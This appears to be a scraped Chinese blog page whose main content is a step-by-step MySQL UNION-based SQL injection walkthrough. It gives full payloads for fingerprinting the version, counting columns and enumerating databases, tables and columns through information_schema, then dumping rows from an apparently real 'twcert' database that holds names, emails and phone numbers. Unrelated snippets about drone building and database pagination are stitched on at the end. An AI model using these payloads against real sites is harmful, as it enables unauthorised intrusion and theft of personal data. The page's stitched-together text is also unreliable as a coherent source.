and ord(mid(version(),1,1))>51 返回正常,說明大於4.0版本,支援ounion查詢
2.猜解字段數目,用order by也可以猜,也可以用union select乙個乙個的猜解
and 2=4 union select 1,2,3,4,5,6,7,8,9--
3.檢視資料庫版本及當前使用者, and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
資料庫版本5.1.35,據說mysql4.1以上版本支援concat函式,我也不知道是真是假,有待牛人去考證。
4.判斷有沒有寫許可權
and (select count(*) from mysql.user)>0-- 返回錯誤,沒有寫許可權
沒辦法,手動猜表啦
5.查庫,以前用union select 1,2,3,schema_name,5,6,n from information_schema.schemata limit 0,1
但是這個點有點不爭氣,用不了這個命令,就學習了下土耳其***的手法,不多說,如下
+and+1=0+union+select+concat(0x5b78786f6f5d,group_concat(distinct+table_schema),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有資料庫,國外的***就是不一般。資料庫如下:
information_schema,advisory,ir,mad,member,mysql,twcert,vuldb,vulscandb
6.爆表,爆的是twcert庫
+and+1=0+union+select+concat(0x5b78786f6f5d,group_concat(distinct+table_name),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7.爆列名,這次爆的是irsys表
+and+1=0+union+select+concat(0x5b78786f6f5d,group_concat(distinct+column_name),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8.查詢字段數,到這一步,國內很少有***去查詢欄位數的,直接用limit n,1去查詢,直接n到報錯為止。
+and+1=0+union+select+concat(0x5b78786f6f5d,concat(count(*)),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
返回是3,說明每個列裡有3個地段。
9.爆欄位內容
+and+1=0+union+select+concat(0x5b78786f6f5d,name,0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+limit+0,1--
爆出name列的第乙個欄位的內容。
+and+1=0+union+select+concat(0x5b78786f6f5d,name,0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+limit+1,1--
爆出name列的第二個欄位的內容。
mysql暴庫總結
1.判斷版本 and ord mid version 1,1 51 返回正常,說明大於4.0版本,支援ounion查詢 2.猜解字段數目,用order by也可以猜,也可以用union select乙個乙個的猜解 and 2 4 union select 1,2,3,4,5,6,7,8,9 3.檢視...
大牛教你組裝一台無人機
談到現在的各大品牌無人機,王銘認為 一體機價效比不高 對於想直接飛無人機 玩航拍的人來說,一體機可能是個很好的選擇。但是,對於想玩無人機但手頭又不是很富裕的新手來說,自己組一台無人機就是個不錯的選擇。耐心 專心 用心 細心,才能放心。真決定要去自己diy一台無人機的話,你就必須做到這幾點。機架 動力...
BAT大牛教你百萬級資料,分頁如何處理?
構達人 2019 06 02 01 12 16 最近遇到了這麼乙個情況,資料庫裡面的資料由於長期的堆積,導致資料量不斷的上公升,而後台的系統每次進行分頁查詢的時候,效率都會降低很多。後來檢視了一下之後,發現此時的分頁原理主要是採用了傳統的物理分頁 limit n,m 的方式。為了方便演示,我特意建立...